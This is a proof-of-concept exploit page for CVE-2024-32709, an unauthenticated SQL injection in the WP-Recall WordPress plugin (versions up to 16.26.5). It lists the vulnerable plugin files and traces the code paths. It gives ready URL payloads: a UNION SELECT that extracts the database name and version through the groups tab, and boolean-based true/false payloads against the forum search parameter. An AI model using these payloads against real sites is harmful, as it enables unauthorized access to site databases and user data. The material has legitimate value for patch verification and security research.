Share
## https://sploitus.com/exploit?id=99A72640-82D3-507E-A12E-762811FF3176
# CVE-2024-32709-Poc
WP-Recall โ Registration, Profile, Commerce & More <= 16.26.5 - Unauthenticated SQL Injection
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-recall/wp-recall-registration-profile-commerce-more-16265-unauthenticated-sql-injection
Build wordpress: docker-compose -f stack.yml up
Diff wp-recall.16.26.5 vs wp-recall.16.26.6
- File: wp-recall\add-on\groups\classes\class-rcl-groups-list.php (Add-on Groups)

- File: wp-recall\add-on\prime-forum\classes\class-prime-query.php (Add-on PrimeForum)

- File: wp-recall\add-on\rating-system\core.php (Add on Rating System)

Note: After install wp-recall Default Config
- Add-on Groups default: Inactive
- Add-on PrimeForum default: Inactive
- Add-on Rating System default: Active

### Exploit Unauthenticated SQL Injection Add-on Groups (Require status: Active)
Step 1 File: wp-recall\add-on\groups\classes\class-rcl-groups-list.php


Step 2: Search Initialize the object with class `Rcl_Groups_List` with keyword "new Rcl_Groups_List("
- File: add-on\groups\shortcodes.php

Step 3: Search for functions that call the function rcl_get_grouplist
- File: add-on\groups\index.php


### Payload: ``` <Host>/account/?user=1&tab=groups&group-name=p'+or+'%'='%'+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat("Database:",database(),0x7c,"Version:",version()),13--+- ```

### Exploit Unauthenticated SQL Injection Add-on PrimeForum (Require status: Active)
Step 1 File: wp-recall\add-on\prime-forum\classes\class-prime-query.php => function setup_child_items()

Step 2: Search Initialize the object with class `PrimeQuery` with keyword "new PrimeQuery("
- File: add-on\prime-forum\index.php

- File: wp-recall\add-on\prime-forum\classes\class-prime-query.php

### Exploit Boolean-based SQL injection
Payload condition true: ``` /forum/?fs=.%'+or+if(1=1,'%',1)=' ```

Payload condition false: ``` /forum/?fs=.%'+or+if(1=2,'%',1)=' ```

### Exploit Add-on Rating System: (Comming Soon) ```[ratinglist days="{injection}"] ```